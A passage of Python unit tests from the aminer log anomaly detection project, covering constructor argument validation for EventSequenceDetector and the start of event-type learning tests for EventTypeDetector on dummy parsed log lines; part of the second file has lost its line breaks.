        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[])
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None)

        # seq_len: positive int only (a float such as 100.22 is a TypeError, not rounded).
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=-1)
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=0)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=100.22)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len="123")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], seq_len=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], seq_len=100)

        # timeout: positive number; unlike seq_len, a float is accepted.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=-1)
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=0)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout="123")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], timeout=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], timeout=100)
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], timeout=100.22)

        # persistence_id: non-empty str; None is a TypeError here, not a default.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default")

        # learn_mode: bool only; truthy strings and numbers are rejected.
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True)

        # output_logline: bool only, including a rejection of None.
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True)

        # ignore_list: list of non-empty path strings; [] and None are accepted.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[])
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None)

        # constraint_list: same rules as ignore_list.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[])
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None)

        # stop_learning_time: positive number (int or float), checked together with learn_mode=True.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=-1)
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=0)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time="123")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100)
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22)

        # stop_learning_no_anomaly_time: same rules as stop_learning_time.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=-1)
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=0)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time="123")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=["Default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=[])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_no_anomaly_time=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100)
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22)

        # The two stop_learning_* options are mutually exclusive.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True,
                          stop_learning_time=100, stop_learning_no_anomaly_time=100)

        # log_resource_ignore_list: list of resource URIs; a bare filesystem path is rejected with ValueError.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler],
                          log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler],
                          log_resource_ignore_list=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler],
                          log_resource_ignore_list={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()


# ---- archive member boundary: logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventTypeDetectorTest.py ----
import time
import unittest

from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD


class EventTypeDetectorTest(TestBase):
    """Unittests for the EventTypeDetector."""

    # Shared fixtures built once at class level. Two different parsed log lines share the parser path
    # layout /seq, /seq/s11 and /seq/d1, so they fall into one event type; match_element3 matches only
    # /seq/s11 and gives a second, smaller event type.
    match_context = DummyMatchContext(b" pid=25537 uid=2")
    fdme1 = DummyFixedDataModelElement("s11", b" pid=")
    fdme2 = DummyFixedDataModelElement("d1", b"25537")
    seq1 = DummySequenceModelElement("seq", [fdme1, fdme2])
    match_element1 = seq1.get_match_element("", match_context)

    # match_context is deliberately rebound: the second sequence is matched against fresh input.
    match_context = DummyMatchContext(b"ddd 25538ddd ")
    fdme3 = DummyFixedDataModelElement("s11", b"ddd ")
    fdme4 = DummyFixedDataModelElement("d1", b"25538")
    seq2 = DummySequenceModelElement("seq", [fdme3, fdme4])
    match_element2 = seq2.get_match_element("", match_context)
    match_element3 = fdme3.get_match_element("/seq", match_context)
def test1receive_atom(self): """Test if log atoms are processed correctly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, etd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, etd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, etd) # default arguments # In this test case multiple log_atoms are received with default values of the EventTypeDetector. target_path_list is empty and all paths are learned dynamically in variable_key_list. self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0, 25538.0], [" pid=", "ddd "], [" pid=25537", "ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) 
self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0, 25538.0], [" pid=", "ddd "], [" pid=25537", "ddd 25538"]], [["ddd "]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True]]) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # default arguments + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) 
self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # target_path_list + save_values=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[" pid="]]]) self.assertEqual(etd.check_variables, [[True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if 
isinstance(y[0], str)]) for x in etd.values], [[[" pid=", "ddd "]]]) self.assertEqual(etd.check_variables, [[True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[" pid=", "ddd "]], [["ddd "]]]) self.assertEqual(etd.check_variables, [[True], [True]]) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # target_path_list + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/seq/s11"], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) 
self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # id_path_list + save_values=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y 
for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [[25538.0], ["ddd "], ["ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) 
self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=True + allow_missing_id=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11", "/seq/s12"]) self.assertFalse(etd.receive_atom(log_atom1)) self.assertFalse(etd.receive_atom(log_atom2)) self.assertFalse(etd.receive_atom(log_atom3)) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11", "/seq/s12"], allow_missing_id=True) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) 
